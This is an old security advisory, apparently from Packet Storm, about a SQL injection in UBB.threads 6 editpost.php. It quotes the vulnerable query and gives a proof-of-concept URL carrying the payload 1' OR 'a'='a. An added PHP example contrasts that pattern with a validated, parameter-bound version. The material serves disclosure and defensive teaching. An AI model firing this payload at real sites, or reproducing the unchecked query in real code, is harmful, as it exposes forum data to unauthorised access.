ubbSQL.txt

2005-03-15T00:00:00
ID PACKETSTORM:36601
Type packetstorm
Reporter kreon
Modified 2005-03-15T00:00:00

Description

                                        
ADZ Security Team  
===================  
Info  
  
Program: UBB.threads  
Version: 6  
Module: editpost.php  
Bug type: SQL Injection  
Vendor site: http://www.ubbcentral.com/ubbthreads/  
===================  
Bug description  
  
In editpost.php we can see this code:  
// START  
$Cat = get_input("Cat","get");  
$Board = get_input("Board","get");  
$Number = get_input("Number","get");  
$page = get_input("page","get");  
$what = get_input("what","get");  
$vc = get_input("vc","get");  
// ...........  
$query = "  
SELECT  
B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,  
B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,  
B_AddSig,B_Board FROM {$config['tbprefix']}Posts  
WHERE B_Number = '$Number'  
";  
//..........  
// END  
As we can see, $Number is not checked to be an integer value before it is used in the query, so... :)  
===================  
Example/PoC:  
  
http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a  
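
The missing integer check described above, next to one way to add it. This is an added example, not UBB.threads code and not part of the original advisory. It assumes PHP with the pdo_sqlite extension; the in-memory Posts table, its rows and the function names are constructed for illustration.

```php
<?php
// Added example, not UBB.threads code. Column names follow the query quoted
// in the advisory; the table contents and helper names are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE Posts (B_Number INTEGER PRIMARY KEY, B_Posterid INTEGER, B_Subject TEXT)");
$db->exec("INSERT INTO Posts VALUES (1, 10, 'first post'), (2, 20, 'second post'), (3, 30, 'third post')");

// Pattern from the advisory: the raw GET value is interpolated into the SQL string.
function fetch_post_vulnerable(PDO $db, string $number): array
{
    $query = "SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = '$number'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: reject anything that is not a positive integer, then bind
// the value as a typed parameter so it is never parsed as SQL.
function fetch_post_hardened(PDO $db, string $number): array
{
    $id = filter_var($number, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('Number must be a positive integer');
    }
    $stmt = $db->prepare('SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = :number');
    $stmt->bindValue(':number', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs: a legitimate post number and the decoded Number value from the PoC URL.
foreach (['2', "1' OR 'a'='a"] as $input) {
    printf("input %s: vulnerable rows = %d, ", var_export($input, true),
        count(fetch_post_vulnerable($db, $input)));
    try {
        printf("hardened rows = %d\n", count(fetch_post_hardened($db, $input)));
    } catch (InvalidArgumentException $e) {
        printf("hardened: rejected (%s)\n", $e->getMessage());
    }
}
```

With the interpolated query, the second input turns the WHERE clause into a condition that is true for every row, so the row count no longer depends on the requested post number. The hardened function rejects that input before any SQL is built.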
===================  
Contact  
  
ADZ Security Team // http://adz.void.ru/  
kreon // kre0n@mail.ru, adz.kreon@gmail.com  
===================  
  
  
  